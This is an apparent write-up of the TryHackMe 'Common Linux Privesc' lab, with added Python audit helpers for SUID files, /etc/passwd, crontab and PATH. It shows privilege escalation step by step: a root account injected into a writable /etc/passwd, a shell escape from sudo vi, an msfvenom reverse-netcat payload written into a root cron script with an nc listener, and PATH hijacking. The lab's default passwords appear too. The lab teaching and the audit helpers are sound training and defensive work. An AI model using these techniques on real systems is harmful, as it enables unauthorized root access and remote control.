Common Linux Privesc Walkthrough

Hacer Dalkiran
7 min read · Jun 6, 2023

In this part, we will solve the TryHackMe "Common Linux Privesc" room and explore some details of Linux privilege escalation.

Task 3

This task explains that there are two main types of privilege escalation. Strictly speaking, the word "escalation" fits the horizontal kind poorly, since no privileges are actually raised, but I will explain both horizontal and vertical privilege escalation.

Horizontal privilege escalation means the attacker takes over another user's rights without that account having any higher privileges. For example, user1 and user2 are both normal users, and user1 hijacks user2's account.

Vertical privilege escalation is our real target: gaining higher rights than the current account. The best outcome here is to become root or Administrator.

Task 4: Enumeration

Here, we will use a tool called LinEnum.

The tool is a simple bash script that automates local enumeration checks relevant to privilege escalation.

You can use the link below to download this script.

We can get the “LinEnum.sh” file onto the target in two ways. The first is to serve the .sh file from a Python web server on our machine and fetch it on the target with wget. The second, more practical way is to copy the raw script and paste it into a file with the .sh extension on the target machine.

I usually prefer the second way, but to show the first one, I will use it here.

So I start a Python web server on my machine with “python3 -m http.server 8000”.

Then, on user3's desktop, I run the command below:

wget "10.10.9.174:8000/LinEnum.sh"

Let’s add execute permission to this .sh file with chmod:

chmod +x FILENAME.sh

Using the ls -la command, I confirm that the file is now executable:

rwxrwxr-x

Next, we run the script with “./LinEnum.sh”.

To understand Linux privilege escalation, we first need to understand SUID files.

SUID is a special permission bit that lets other users run an executable with the file owner’s privileges. That is exactly what makes it exploitable when it is set on the wrong file.

Prefixing the octal permission with a 4 sets the SUID bit on a file.

For example, if our file has 777 permissions, 4777 is the same file with the SUID bit added.

sudo chmod 4777 FILE
ls -la
-rwsrwxrwx 1 kali kali ...

The s in the owner’s execute position means the SUID bit is set on this file.

My final note on the SUID bit: we can find SUID files on the system with the following command.

find / -perm -u=s -type f 2>/dev/null
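An auditor wants the same list that the find command above produces, plus a warning when a SUID file is also writable by others, because a non-owner could then replace a program that runs as the owner. The Python helper below is an added example, not part of the original post or the TryHackMe room; the sample tree and its file names are constructed, mirroring the 4777 and 755 modes discussed above.

```python
import os
import stat
import tempfile

def find_setid_files(root):
    """Walk `root` and return (path, octal mode, flags) for every regular file
    with the SUID or SGID bit set. `flags` also records group/world write
    bits, the combination an auditor cares about most."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # unreadable entry, like 2>/dev/null
            mode = st.st_mode
            if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            flags = []
            if mode & stat.S_ISUID:
                flags.append("suid")
            if mode & stat.S_ISGID:
                flags.append("sgid")
            if mode & stat.S_IWGRP:
                flags.append("group-writable")
            if mode & stat.S_IWOTH:
                flags.append("world-writable")
            findings.append((path, oct(stat.S_IMODE(mode)), flags))
    return findings

def make_sample_tree():
    """Constructed fixture: three files in a temp dir with the modes from the
    text (4755 = typical SUID binary, 4777 = the chmod 4777 example, 755)."""
    root = tempfile.mkdtemp()
    for name, mode in (("passwd-like", 0o4755), ("wide-open", 0o4777), ("plain", 0o755)):
        path = os.path.join(root, name)
        open(path, "w").close()
        os.chmod(path, mode)
    return root

def audit(root=None):
    """Map basename -> flags for the SUID/SGID files under `root`
    (defaults to the constructed sample tree)."""
    if root is None:
        root = make_sample_tree()
    return {os.path.basename(p): flags for p, _mode, flags in find_setid_files(root)}
```

Run audit("/") as root to cover the whole system; unreadable paths are skipped the same way the find command skips them.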

First, let's SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.

  • Completed

What is the target’s hostname?

  • polobox

Look at the output of /etc/passwd how many “user[x]” are there on the system?

  • 8

How many available shells are there on the system?

  • 4

We can find the available shells with the cat /etc/shells command.

What is the name of the bash script that is set to run every 5 minutes by cron?

  • autoscript.sh

Using cat /etc/crontab, we find the following entry:

/home/user4/Desktop/autoscript.sh

What critical file has had its permissions changed to allow some users to write to it?

  • /etc/passwd

Let's talk about this file. It holds the account information for every user on the machine.

Everyone can read this file, but write permission normally belongs only to root (the superuser). The file is owned by root and its normal permission is 644; on this target, however, it shows up as group-writable:

  • rw-rw-r-- 1 root root

We will also be looking for passwords in the /etc/shadow file, which holds the hashed passwords. This file is readable only by the superuser.

Task 5: Abusing SUID/GUID Files

SUID is a permission bit flag that applies to executables. SUID allows an alternate user to run an executable with the same permissions as the owner of the file instead of the permissions of the alternate user.

SUID : rws-rwx-rwx

GUID : rwx-rws-rwx

Finding SUID binaries: we have already reached these SUID files thanks to LinEnum.

However, we can find SUID binaries also by using the following command:

find / -perm -u=s -type f 2>/dev/null

2>/dev/null suppresses the permission-denied errors; -perm -u=s matches files with the SUID bit set, and -type f restricts the search to regular files.

What is the path of the file in user3’s directory that stands out to you?

  • /home/user3/shell

This file is SUID, which means running it gives us the owner's (root's) privileges.

So, let's look at this file first, and then run it.

Running it, we learn that user7 is a member of the root group (GID 0). UID 0 is reserved for the root user.

Task 6: Exploiting Writable /etc/passwd

If we can write to the /etc/passwd file, we can manipulate user accounts.

Let's switch to user7 with the su command and the password "password".

Having read the information above, what direction privilege escalation is this attack?

  • vertical

Let's create a compliant password hash to add a new user with.

We will do this by using openssl.

openssl passwd -1 -salt "new" "123"

and we get the hash below:

What is the hash created by using this command with the salt, “new” and the password “123”?

  • $1$new$p7ptkEKU1HnaHpRtzNizS1

Since we can write to the /etc/passwd file, we can create a new root user.

What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?

  • new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root://bin/bash

Looking at /etc/passwd, I see the root entry below:

root:x:0:0:root:/root:/bin/bash

Then, I replace “root” with “new”

and “x” with “$1$new$p7ptkEKU1HnaHpRtzNizS1”

Great! Now you’ve got everything you need. Just add that entry to the end of the /etc/passwd file!

I append the entry above to the /etc/passwd file.

Now, use “su” to login as the “new” account, and then enter the password. If you’ve done everything correctly, you should be greeted by a root prompt!

Using “su new” with the password “123”, I get root privileges.
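From the defender's side, this attack leaves two visible traces: a password hash sitting in field 2 of /etc/passwd (legitimate entries carry x and keep the hash in /etc/shadow) and a second UID 0 account. The Python audit below is an added example, not the post's or the room's code; the sample passwd body is constructed around the entries discussed above, and the mode check covers the group-writable 664 state seen in Task 4.

```python
import stat

# Constructed sample of /etc/passwd after the Task 6 attack: the last line is
# the injected entry, carrying the MD5-crypt hash directly in field 2 and UID/GID 0.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user3:x:1003:1003:user3,,,:/home/user3:/bin/bash
user7:x:1007:0:user7,,,:/home/user7:/bin/bash
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
"""

def audit_passwd(text):
    """Return (account, reason) findings for the body of a passwd file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", f"malformed entry with {len(fields)} fields"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((name, "empty password field, login needs no password"))
        elif pw not in ("x", "*", "!", "!!"):   # anything else is a hash kept outside shadow
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if gid == "0" and name != "root":
            findings.append((name, "primary group is root (GID 0)"))
    return findings

def check_passwd_mode(st_mode):
    """Flag write bits beyond the expected 0644 on /etc/passwd (root-owned,
    owner-writable only); the room's target shows 664, i.e. group-writable."""
    problems = []
    if st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems
```

On a live host, feed open("/etc/passwd").read() to audit_passwd and os.stat("/etc/passwd").st_mode to check_passwd_mode.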

Task 7: Escaping Vi Editor

First, we should run the “sudo -l” command to see which commands we can run as the superuser.

Switch to user8 with “su user8” and the password “password”, then run “sudo -l”. I see that user8 may run:

“NOPASSWD: /usr/bin/vi”

Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?

  • NOPASSWD

So, all we need to do is open vi as root, by typing “sudo vi” into the terminal.

Now, type “:!sh” to open a shell!

Yessss!! I got a shell.

Task 8: Exploiting Crontab

By “cat /etc/crontab”, we see the entries below:

Let's create a payload for crontab using msfvenom.

What is the flag to specify a payload in msfvenom?

  • -p

Create a payload using: “msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R -o Payload”

What directory is the “autoscript.sh” under?

  • /home/user4/Desktop

Then I get the Payload file from my machine to the target with wget as before, or paste its contents into autoscript.sh with echo as below:

echo [Payload] > /home/user4/Desktop/autoscript.sh

Then I start a netcat listener on my machine on port 8888 with the command below:

nc -lvnp 8888

Then I wait for cron to run the script (it runs every 5 minutes) and hand me a root shell from the victim machine.

Task 9: Exploiting PATH Variable

Tryhackme says that: “PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by a user.”

It is very simple to view the PATH of the current user with the command “echo $PATH”.

For example, for the “new” user:

/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

We will rewrite the PATH variable to point at a location of our choosing.

Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?

  • ls

When we list the directory, the “script” file is shown in red.

After copying this file to /tmp/, I check its permissions with “ls -la”:

  • rwxr-xr-x 1 user5 user5 8392 May 31 13:36 script

Let's create an imitation executable. I will use the “ls” command for the sake of simplicity.

What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating?

  • echo “/bin/bash” > ls

Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?

  • chmod +x ls
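Tasks 8 and 9 both come down to the same weakness: a file or directory that a low-privileged user can write to and that a privileged process later executes or searches. The Python check below is an added example, not code from the original post or the room; it parses /etc/crontab lines and PATH entries and flags the writable ones. The crontab text, the script and the bin directory built by make_demo are constructed fixtures.

```python
import os
import stat
import tempfile

def writable_by_others(path):
    """True when group or world write bits are set on `path` (symlinks are
    followed, so a /bin -> usr/bin link is judged by its target)."""
    try:
        return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    except OSError:
        return False

def audit_crontab(text):
    """Parse /etc/crontab lines (min hour dom mon dow user command) and return
    (user, script) pairs where the scheduled script is writable by others."""
    findings = []
    for line in text.splitlines():
        parts = line.split(None, 6)
        if len(parts) < 7 or parts[0].startswith("#") or "=" in parts[0]:
            continue                      # blank, comment, or VAR=value line
        user, script = parts[5], parts[6].split()[0]
        if writable_by_others(script):
            findings.append((user, script))
    return findings

def audit_path(path_value):
    """Return (entry, reason) for PATH entries that are empty or relative (the
    current directory gets searched) or are directories others can write to."""
    findings = []
    for entry in path_value.split(":"):
        if entry == "" or not os.path.isabs(entry):
            findings.append((entry or "<empty>", "relative entry searches the current directory"))
        elif writable_by_others(entry):
            findings.append((entry, "writable by others, commands here can be shadowed"))
    return findings

def make_demo():
    """Constructed fixture: a 777 cron script (as in Task 8) and a 777 bin dir."""
    root = tempfile.mkdtemp()
    script = os.path.join(root, "autoscript.sh")
    open(script, "w").close()
    os.chmod(script, 0o777)
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    os.chmod(bindir, 0o777)
    crontab = "SHELL=/bin/sh\n*/5 * * * * root %s\n0 1 * * * root /usr/bin/apt update\n" % script
    return crontab, "%s:/usr/bin:." % bindir, script, bindir
```

On a real host, pass open("/etc/crontab").read() and os.environ["PATH"] to the two audit functions; the second argument of audit_crontab's tuple is the exact file a root cron job will execute.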
